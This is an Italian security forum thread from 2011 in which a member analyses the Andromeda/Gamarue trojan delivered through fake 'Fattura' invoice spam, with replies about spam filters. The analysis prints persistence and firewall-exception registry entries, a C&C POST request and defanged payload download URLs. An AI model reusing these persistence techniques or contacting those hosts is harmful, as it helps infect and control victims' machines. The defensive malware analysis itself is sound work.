Punto informatico Network
Login Esegui login | Non sei registrato? Iscriviti ora (è gratuito!)
Username: Password:
  • Annuncio Pubblicitario

Trojan.Win32.Jorik.Androm.u - Analisi Completa

Un virus si è intromesso nel tuo computer? Vuoi navigare in tutta sicurezza? Sono sicure le transazione online? Come impedire a malintenzionati di intromettersi nel tuo pc? Come proteggere i tuoi dati? Qui trovi le risposte a queste ed altre domande

Trojan.Win32.Jorik.Androm.u - Analisi Completa

Messaggioda hashcat » lun ott 24, 2011 8:53 pm

  • Nome del virus e sue varianti:
    • Kaspersky: Trojan.Win32.Jorik.Androm.u
    • MSE: Worm:Win32/Gamarue.B
    • AhnLab-V3: Spyware/Win32.Zbot
  • Tipologia: Worm / BOT

  • Sistemi Operativi affetti: Windows

  • Descrizione/Note: Virus presente in un email di spam ricevuta da un conoscente.
  • Articoli su MegaLab.it inerenti e altri link utili
  • Discussione forum MegaLab
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Recentemente ho notato l'invio massiccio di email simili a questa:

Mittente: PAY (VMyrick@[rimosso].net)

Oggetto: Pagamento 1XXX-XXX (XXX numeri casuali)

Messaggio:

Buongiorno,
Si prega di notare che hai una fattura.

hxxp://technofluid.ro/account/Fattura.zip?XXXX (X caratteri alfanumerici casuali per il referer)

Tel./Fax.: +39 (39) 646 97 61


Attualmente l'archivio zip malevolo è stato rimosso e non è più disponibile.


Introduzione:

Navigando alla radice del sito web technofluid ottengo un errore 403 di Accesso Negato.
Leggendo le informazioni Whois del sito scopro che malgrado il dominio del sito sia rumeno (.ro) questo è ospitato su di un server italiano gestito da Aziende Italia S.r.l..
Successivamente interrogo il Whois di RoTLD e leggo che il possessore del dominio è Mazzanti Matteo, viene fornito un indirizzo relativo a Bucarest, il numero di telefono e di fax di questo signore e la relativa email matteo.mazzanti[ at ]hotmail.com. Ho verificato tramite mailtester.com l'esistenza di questo indirizzo e sembra essere valido.
Aziende Italia S.r.l. è una compagnia italiana che si occupa di ospitare a pagamento il sito web.
La discrepanza tra la nazionalità del server sul quale è hostato il sito e il domino registrato è spiegabile: Matteo Mazzanti è il propietario del business TECHNO FLUID S.r.l. con sede In Romania, e si affida ad un hoster italiano per ospitare il sito.
Il dominio è registrato dal 2001, probabilmente il sito web è stato compromesso ed utilizzato per veicolare il malware studiato in questa analisi.
Come possiamo notare all'interno dell'email è presente un link per scaricare la presunta fattura, dopo il nome del file Fattura.zip? sono presenti da quattro a 6 cifre alfanumeriche (oscurate per privacy) che servono a tracciare il download.
All'interno dell'archivio zip è presente un unico file, Fattura.Pdf, il nome include 66 underscore per nasconderne la reale natura di eseguibile.
Tra le informazioni si può leggere che il campione è stato creato il 19 Ottobre. Il file si spaccia come plugin per Cyberlink (CES System PlugIn 6).
La dimensione del file è di 55 kb; il file è compresso utilizzando UPX 3.0.7 per ridurre le rilevazioni, l'entropia del è infatti pari a 7.73099/8 (96.6374%) ciò indica che il file è sicuramente compresso o offuscato.
Il malware è programmato con Microsoft Visual Studio 2010.
Al momento dell'analisi il file era classificato come malevolo solo da Ahnlab, Kaspersky, Norman.


Comportamento del campione:

Il file Fattura crea 4 eventi: fuckmss, fuckmss1, fuckmss2, fuckmss3. Viene lanciato il processo legittimo svchost.exe.

Successivamente crea il file 111818854.log e lo salva in AppData, crea il file dbs.dat e lo salva in Application Data\firewall\.

Viene creato il file 00110694.tmp in una directory temporanea, viene creato il file system.exe (vuoto) in Application Data\firewall\ e viene lanciato come processo.

Mediante il comando dos copy il file 00110694.tmp viene copiato in Application Data\firewall\ sovrascrivendolo a system.exe (conservando come nome system.exe).

Mediante il comando dos del il file dbs.dat viene eliminato. Mediante il comando dos ren il file system.exe viene rinominato in 7523.bak. Mediante il comando dos taskkill /F /IM system.exe il processo system.exe viene terminato.

Viene creato nuovamente system.exe e lanciato come processo. Viene creato il file 0060ffef.com (identico al campione originale fattura.pdf).

Si imposta l'avvio automatico del file system.exe:

Codice: Seleziona tutto
HKEY_LOCA_MACHINE\Software\microsoft\Windows NT\CurrentVersion\Winlogon\shell = Explorer.exe "C:\Documents and Settings\Administrator\Application Data\firewall\system.exe"


Si imposta l'avvio automatico del file 0060ffef.com:

Codice: Seleziona tutto
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer\run [2600] = C:\DOCUME~1\ALLUSE~1\LOCALS~1\Temp\0060ffef.com


Viene aggiunta un eccezione al Firewall di Windows per consentire le connessioni alla rete da parte di system.exe:

Codice: Seleziona tutto
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Documents and Settings\Administrator\Application Data\firewall\system.exe = C:\Documents and Settings\Administrator\Application Data\firewall\system.exe:*:Enabled:system.exe


Secondo Buster Sandbox Analyzer il campione possiede anche funzionalità di Keylogger.
Il file Fattura.Pdf si autoelimina.

Si imposta il seguente Mutex per marcare la presenza del malware nel sistema:

Codice: Seleziona tutto
Andromeda


Si imposta l'attributoNascosto” per i seguenti files: system.exe, 00110694.tmp, 0060ffef.com.

Avviene una connessione ad internet tramite Winsock verso 87.126.200.246 sulla porta 80 (hxxp://www.duffiduffid.ru):

Codice: Seleziona tutto
OUT,TCP – HTTP 192.168.XXX.XXX, 87.126.200.246:80
IN,TCP – HTTP 87.126.200.246:80, 192.168.XXX.XXX


Avviene una connessione ad internet tramite Winsock verso 60.19.30.135 sulla porta 80 (dzmeritelshop.ru):

Codice: Seleziona tutto
OUT,TCP – HTTP 192.168.XXX.XXX, 60.19.30.135:80
IN,TCP – HTTP 60.19.30.135:80, 192.168.XXX.XXX


Viene scaricato un malware dal seguente url:

hxxp://dzmeritelshop.ru/dbs/0088.exe


Analisi dei files:

Dopo tutti i “magheggi” il file system.exe si presenta come Trojan Spamavicon che si connette a YahooStat.com, sito ospitato in Lituania al momento non più raggiungibile. Un Trojan che utilizza il computer per inviare mail indesiderate a terzi.
Il file system.exe è compresso con UPX 3.0.7, la sua entropia è 7.87713/8 (98.4641%) il suo hash MD5 è il seguente: 4f04cb4e57068c0a84d645ad9d640300. Viene ampiamente rilevato dagli antivirus.
Il file 111818854.log contiene 5 cifre numeriche che vengono utilizzate per tracciare ed identificare l'utente.

Modifiche al registro di sistema (escluse quelle menzionate nell'analisi):

Viene creato il seguente valore:

Codice: Seleziona tutto
[HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Explorer\BitBucket] "NukeOnDelete=00000001"


Che permette di eliminare i file e le cartelle senza farli passare dal cestino.

Viene aggiunta questa voce:

Codice: Seleziona tutto
HKEY_LOCAL_MACHINE\software\microsoft\AA


Utilizzata per marcare la presenza del malware nel sistema

Viene creato il seguente valore:

Codice: Seleziona tutto
[HKEY_CURRENT_USER\software\classes] "SymbolicLinkValue"=5C00520045004700490053005400520059005C0055005300450052005C00530061006E00640062006F0078005F00410064006D0069006E006900730074007200610074006F0072005F00580075006C0062006F0078005C0075007300650072005C00630075007200720065006E0074005F0063006C0061007300730065007300


Questo speciale valore è un link simbolico ed offre una funzione molto importante: Un link simbolico permette di collegare una chiave di registro con un'altra. Il valore del link simbolico è rappresentato da una stringa Unicode (non possiede limiti di lunghezza).

Deoffuscato il link diventa:

Codice: Seleziona tutto
\REGISTRY\USER\Sandbox_Administrator_XXXXXX\user\current_classes


Il percorso per il registro di sistema è espresso nella sintassi di accesso al registro da parte del Kernel.

Viene creata la seguente chiave di registro con un valore calcolato sul sistema infetto (sembrerebbe un hash MD5):

Codice: Seleziona tutto
[HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Applets\Scandisk\data] “id”=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX


Viene modificato il valore della chiave:

Codice: Seleziona tutto
HKEY_CURRENT_USER\current\software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings



Analisi del traffico di rete:

AVVISO: Nel pacchetto contenente l'analisi è presente un file pcacp generato da Anubis, non ho incluso quello registrato durante la mia analisi per motivi di privacy.

Inizialmente possiamo notare un interrogazione DNS per hxxp://www.duffiduffid.ru:

Immagine

Con le relative risposte:

Immagine

Tramite una richiesta HTTP POST:

Codice: Seleziona tutto
POST /stat/stat3.php HTTP/1.1
Host: http://www.duffiduffid.ru
User-Agent: Mozilla/4.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 85
Connection: close


viene inviato il seguente valore:

Codice: Seleziona tutto
data=nnniqklikjonknyfxaxfxgnhrilhskxmnkolubkiyhwfmgykrbvnldwmqduesbtmwmolnepoqkmerixj


Immagine

Non so esattamente a cosa serva questa stringa, ma il suo contenuto è variabile, probabilmente viene utilizzata per riportare l'avvenuta infezione al server C&C e/o per identificare la macchina infetta.

Avviene un interrogazione DNS a dzmeritelshop.ru

Immagine

Con le relative risposte:

Immagine

Tramite una richiesta HTTP GET viene richiesto il file 0088.exe presente al seguente url:

hxxp://dzmeritelshop.ru/dbs/0088.exe

Immagine

Unendo i vari pacchetti dal dump (o scaricandolo dall'indirizzo sopra indicato) si ottiene un file di 137 kb (140288 bytes)

Le informazioni su questo file sono le seguenti:

Il file possiede un entropia pari a 7.877126/8 (98.4641%) ed è compresso con UPX 3.0.7. Questa è la versione finale del file system.exe.

Immagine

Tramite un pacchetto di controllo ACK si notifica l'avvenuta ricezione dei precedenti pacchetti, curioso il nome del pacchetto Window Update:

Immagine

Maggiori informazioni sono presenti nel file pcap.

Approfondimento **Diffusione e Hosting**:

Ecludendo l'analisi su Technofluid che ho già menzionato prima passiamo a hxxp://www.duffiduffid.ru.

Cercando i dati Whois per duffiduffid ottengo poche informazioni:

Il detentore del dominio è sconosciuto (Private Person), il dominio è stato registrato il 05/10/2011 presso NAUNET-REG-RIPN.
Interrogando il Wohis di NAUNET non ottengo maggiori informazioni.
E' degno di nota il commento dell'utente MarkGiles (WOT) che riporta: “Un azienda situata in Russia - NAUNET-REG-RIPNaccetta contratti di servizio da criminali per nomi di dominio .ru (russi). Questi criminali stanno facendo scendere la reputazione ad un livello sempre più basso. Una ricerca sullo spam condotta ad Ottobre mostrava che il 93.16% delle email inviate nell'arco di 5 giorni – 218 / 234 domini – provenivano da NAUNET-REG-RIPN.
Il sito Spam Trackers EU classifica NAUNET-REG-RIPN in questo modo: “Ignora le richieste di sospendere i domini illegali”.
DuffiDuffid.ru è presente nella lista dei domini bloccati di Spamhaus. Il sito è classificato come pericoloso e di phishing da SURBL.
Una cosa curiosa che ho notato è che non si riesce a capire bene dove sia ospitato questo sito:
Probabilmente è ospitato in Cina, Robtex mi indica 5 indirizzi ip dove posso trovare il sito web:
Due Cinesi con ip differenti ma che si riferiscono allo stesso provider presenti su malwaredomainlist.com, su Spamhaus per aver ospitato server di una botnet SpyEye e suo Autoshun per aver ospitato server di una botnet Zeus, uno Americano classificato da Autoshun come Zeus C&C, Polonia classificato da Autoshun allo stesso modo e da Spamhaus come ZeuS botnet controller e Bulgaria presente nella Open blocklist per aver effettuato tre attacchi di bruteforce sulle macchine fantoccio.
Anche l'altro sito dzmeritelshop.ru ha registrato il proprio dominio con NAUNET.
Interrogando il Whois si presenta una situazione analoga alla precedente, poche informazioni, il detentore è Private Person, il dominio è stato registrato il 04/09/2011.
Dzmeritelshop.ru è presente nella lista di domini bloccati da Spamhaus e viene segnalato come pericoloso da molte altre liste.
Anche per Robtex situazione analoga, mi indica 4 indirizzi ip dove è ospitato il sito web. Tre dei quali sono gli stessi dell'altro sito (America, Bulgaria, Polonia). Il restante ip anch'esso Americano è noto per aver ospitato server di controllo Zeus ed è presente nella malwaredomainlist.com.

Auguro a tutti una buona lettura e invito i lettori a segnalarmi sviste o errori.

[weponed] [weponed]
Avatar utente
hashcat
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 2285
Iscritto il: lun ott 25, 2010 1:26 pm

Re: Trojan.Win32.Jorik.Androm.u - Analisi Completa

Messaggioda CRYPAX » lun ott 24, 2011 10:29 pm

che analisi [applauso+] [8D]
i miei complimenti ..
domanda :i provider di posta elettronica ,non identificano come spam l'email??
Avatar utente
CRYPAX
Bronze Member
Bronze Member
 
Messaggi: 994
Iscritto il: sab lug 24, 2010 5:01 pm
Località: K-PAX

Re: Trojan.Win32.Jorik.Androm.u - Analisi Completa

Messaggioda crazy.cat » mar ott 25, 2011 2:59 am

CRYPAX ha scritto:domanda :i provider di posta elettronica ,non identificano come spam l'email??

Su libero in particolare no.
Ci sono dei giorni che ne ricevo a decine di queste fatture e avvisi di pagamento di vario tipo e non tutte finiscono nello spam.

Complimenti ad hashcat per il lavoro fatto (peccato non poterlo ancora pubblicare in home page...)
Quando i molti governano, pensano solo a contentar sé stessi, si ha allora la tirannia più balorda e più odiosa: la tirannia mascherata da libertà.
Avatar utente
crazy.cat
MLI Hero
MLI Hero
 
Messaggi: 30959
Iscritto il: lun gen 12, 2004 1:38 pm
Località: Mestre


Re: Trojan.Win32.Jorik.Androm.u - Analisi Completa

Messaggioda CRYPAX » mar ott 25, 2011 12:41 pm

ok
grazie della risposta
Avatar utente
CRYPAX
Bronze Member
Bronze Member
 
Messaggi: 994
Iscritto il: sab lug 24, 2010 5:01 pm
Località: K-PAX

Re: Trojan.Win32.Jorik.Androm.u - Analisi Completa

Messaggioda Sabbb » mar ott 25, 2011 12:50 pm

crazy.cat ha scritto: (peccato non poterlo ancora pubblicare in home page...)
Almeno si potrebbe togliere dalla sezione MegaVirusLab,e spostarlo in sicurezza :in questo modo lo potranno vedere anche gli utenti non registrati.

Complimenti hashcat .
Avatar utente
Sabbb
Utente inattivo
 
Messaggi: 4483
Iscritto il: sab set 04, 2010 11:19 am

Re: Trojan.Win32.Jorik.Androm.u - Analisi Completa

Messaggioda farbix89 » mar ott 25, 2011 3:01 pm

Sabbb ha scritto:Almeno si potrebbe togliere dalla sezione MegaVirusLab,e spostarlo in sicurezza :in questo modo lo potranno vedere anche gli utenti non registrati.


Il download di Malware al di fuori di questa sezione non è al momento consentito,quindi se non si separano le due cose (scheda download e analisi dettagliata) non penso che verrà spostata.

Se hashcat è d'accordo,si può lasciare in questa sezione la prima parte della scheda riguardante le info generali e per il download, copiando il resto dell'analisi dettagliata anche in un topic presente in Sicurezza,eventualmente linkato anche nella scheda qui presente [:)]
Avatar utente
farbix89
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 14093
Iscritto il: ven feb 13, 2009 10:09 pm

Re: Trojan.Win32.Jorik.Androm.u - Analisi Completa

Messaggioda hashcat » mar ott 25, 2011 3:05 pm

farbix89 ha scritto:
Sabbb ha scritto:Almeno si potrebbe togliere dalla sezione MegaVirusLab,e spostarlo in sicurezza :in questo modo lo potranno vedere anche gli utenti non registrati.


Il download di Malware al di fuori di questa sezione non è al momento consentito,quindi se non si separano le due cose (scheda download e analisi dettagliata) non penso che verrà spostata.

Se hashcat è d'accordo,si può lasciare in questa sezione la prima parte della scheda riguardante le info generali e per il download, copiando il resto dell'analisi dettagliata anche in un topic presente in Sicurezza,eventualmente linkato anche nella scheda qui presente [:)]

Per quanto mi riguarda non ci sono problemi [^]
Avatar utente
hashcat
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 2285
Iscritto il: lun ott 25, 2010 1:26 pm

Re: Trojan.Win32.Jorik.Androm.u - Analisi Completa

Messaggioda farbix89 » mar ott 25, 2011 3:08 pm

Ci vuole l'aiuto di un Mod globale o di un admin,avviso subito [^]
Avatar utente
farbix89
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 14093
Iscritto il: ven feb 13, 2009 10:09 pm

Re: Trojan.Win32.Jorik.Androm.u - Analisi Completa

Messaggioda crazy.cat » mar ott 25, 2011 3:23 pm

farbix89 ha scritto:Ci vuole l'aiuto di un Mod globale o di un admin,avviso subito [^]

Ho fatto una copia della discussione togliendo il link al download.
Io cancellerei i post dall'altra lasciando solo la prima scheda con l'analisi.
Quando i molti governano, pensano solo a contentar sé stessi, si ha allora la tirannia più balorda e più odiosa: la tirannia mascherata da libertà.
Avatar utente
crazy.cat
MLI Hero
MLI Hero
 
Messaggi: 30959
Iscritto il: lun gen 12, 2004 1:38 pm
Località: Mestre

Re: Trojan.Win32.Jorik.Androm.u - Analisi Completa

Messaggioda farbix89 » mar ott 25, 2011 3:23 pm

crazy.cat ha scritto:Io cancellerei i post dall'altra lasciando solo la prima scheda con l'analisi.


Provvedo [^]
Avatar utente
farbix89
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 14093
Iscritto il: ven feb 13, 2009 10:09 pm

Re: Trojan.Win32.Jorik.Androm.u - Analisi Completa

Messaggioda Palpas » lun ott 31, 2011 12:54 pm

che lavoro!! bravo hashcat! [^]
Zane grazie per l'esperienza MLI
Avatar utente
Palpas
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 2544
Iscritto il: mar set 25, 2007 4:48 pm

Re: Trojan.Win32.Jorik.Androm.u - Analisi Completa

Messaggioda crazy.cat » gio nov 24, 2011 7:23 pm

Nuova ondata, si presenta come un falso documento pricenew.xlsx____________________________.exe

LIbero mail lascia passare tutto senza neanche accorgersene.
Ci sono anche le varianti update.pdf e document.doc sempre ___________________.exe

Per chi vuole i tre campioni sono in deposito al solito posto.
Quando i molti governano, pensano solo a contentar sé stessi, si ha allora la tirannia più balorda e più odiosa: la tirannia mascherata da libertà.
Avatar utente
crazy.cat
MLI Hero
MLI Hero
 
Messaggi: 30959
Iscritto il: lun gen 12, 2004 1:38 pm
Località: Mestre

Re: Trojan.Win32.Jorik.Androm.u - Analisi Completa

Messaggioda Kratos_Fury » dom dic 04, 2011 8:57 pm

La mia casella di posta di Tiscali è stata invasa da questa roba e anche se blocco il mittente, tutto ritorna da un altro indirizzo.
Se gli uomini non commettessero talvolta delle sciocchezze, non accadrebbe assolutamente nulla di intelligente. (Ludwig Wittgenstein)
Avatar utente
Kratos_Fury
Senior Member
Senior Member
 
Messaggi: 323
Iscritto il: dom apr 17, 2011 12:47 pm


Torna a Sicurezza

Chi c’è in linea

Visitano il forum: Nessuno e 3 ospiti

Powered by phpBB © 2002, 2005, 2007, 2008 phpBB Group
Traduzione Italiana phpBB.it

megalab.it: testata telematica quotidiana registrata al Tribunale di Cosenza n. 22/09 del 13.08.2009, editore Master New Media S.r.l.; © Copyright 2008 Master New Media S.r.l. a socio unico - P.I. 02947530784. GRUPPO EDIZIONI MASTER Spa Tutti i diritti sono riservati. Per la pubblicità: Master Advertising